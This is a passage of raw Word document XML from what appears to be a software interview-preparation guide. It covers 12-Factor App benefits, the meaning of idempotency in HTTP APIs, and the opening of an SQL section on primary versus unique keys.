          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Running database migrations via a separate process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F714FCD"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java -jar migration-tool.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790F4635"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pict w14:anchorId="679000BF">
          <v:rect id="_x0000_i7541" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A055E2E"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Benefits of the 12-Factor Principles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFAFF8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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Microservices can scale independently based on demand, and horizontal scaling becomes easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A299857"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ortability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Applications are cloud-ready and can be moved easily between different environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6013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silience</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: The statelessness and disposability of microservices enable the system to be more </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>fault-toleran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ilient</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F29A359"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Faster Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: With </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>continuous integration</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continuous deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, the system can be updated quickly and efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C7DA5"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Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: By following the principles, the codebase becomes more modular, maintainable, and easier to evolve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D2DF0" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="00585F60">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Separation of Concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Each microservice is isolated and has a single responsibility, making the system more cohesive and reducing interdependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56780190"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pict w14:anchorId="1A799327">
          <v:rect id="_x0000_i7542" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0E60D" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="00585F60">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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E65A69" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="00585F60">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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>12-Factor App</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> principles provide a clear, structured approach to building cloud-native microservices that are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>port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scalable</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reliable</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easy to maintain</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. These factors promote </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> that encourage </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>modularity</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>flexibility</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resilience</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, making it easier for teams to build and deploy microservices in a cloud environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A27583E" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="450F0AFF">
          <v:rect id="_x0000_i7532" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02712429" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00CE4B95" w:rsidRDefault="000B09B5" w:rsidP="00585F60">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="744" w:name="_Toc197867958"/>
      <w:r w:rsidRPr="00585F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is the meaning of idempotency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="744"/>
    </w:p>
    <w:p w14:paraId="4984E002" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="00585F60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Idempotency is a concept in computing and refers to an operation that can be repeated multiple times without changing the result beyond the initial application. In simpler terms, performing an idempotent operation once or multiple times has the same effect as performing it just once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09927F87"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In the context of APIs and web services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54331D82"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An </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>idempotent HTTP method</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>repeated requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with the same parameters and state) produce the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>same result</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FFD84C"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D19ADCE"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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests are inherently idempotent because retrieving the same resource multiple times doesn’t change the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D9BA5"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UT</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests can be made idempotent by ensuring that the resource’s state or existence doesn’t change after the first request (e.g., updating a resource multiple times with the same data results in the same outcome).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B8BA51"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xamples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED0AA2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UT Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (idempotent):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661CE718" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">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If you send a PUT request to update a resource (e.g., updating a user’s address), sending the same PUT request again should not have any additional effect beyond the first one. It won’t modify the user’s address again because the state is already the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDA7BC0"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POST Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not idempotent by default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA7481" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="144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A POST request that creates a new resource (e.g., creating a new user) is not idempotent. Sending the request multiple times would create multiple instances of the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4472B"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Why is Idempotency Important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668AE8FA"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silience in Distributed Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: In systems like microservices, network failures can cause the same request to be retried. Idempotency ensures that the system remains consistent even if the same action is performed multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A18AD09" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Reliability in API</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Clients can safely retry requests without fearing unintended side effects, making systems more reliable and fault-tolerant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB339E4" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0B0FA" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider a payment API. If you initiate a payment request and it times out, the system should ensure that retrying the same payment request does not result in multiple charges. This can be achieved by making the payment request </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305235CC" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="6D25AB94">
          <v:rect id="_x0000_i7533" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="445AB5A6" w14:textId="77777777" w:rsidR="00AF4871" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75595BFE" w14:textId="77777777" w:rsidR="00AF4871" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20935527" w14:textId="77777777" w:rsidR="007A79BD" w:rsidRPr="00CE4B95" w:rsidRDefault="007A79BD">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AA18B5B" w14:textId="162EE852" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="745" w:name="_Toc197867959"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="745"/>
    </w:p>
    <w:p w14:paraId="1E017D53" w14:textId="77777777" w:rsidR="003C0862" w:rsidRPr="00CE4B95" w:rsidRDefault="003C0862">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB3F367" w14:textId="20BD80AB" w:rsidR="007A79BD" w:rsidRPr="00CE4B95" w:rsidRDefault="007A79BD" w:rsidP="007A79BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="746" w:name="_Toc197867960"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Primary Key and Unique key?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="746"/>
    </w:p>
    <w:p w14:paraId="65AC17C7" w14:textId="08834F13" w:rsidR="00F45251" w:rsidRPr="00393B05" w:rsidRDefault="00F45251" w:rsidP="00884744">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5425"/>
        <w:gridCol w:w="3233"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="4067556C" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
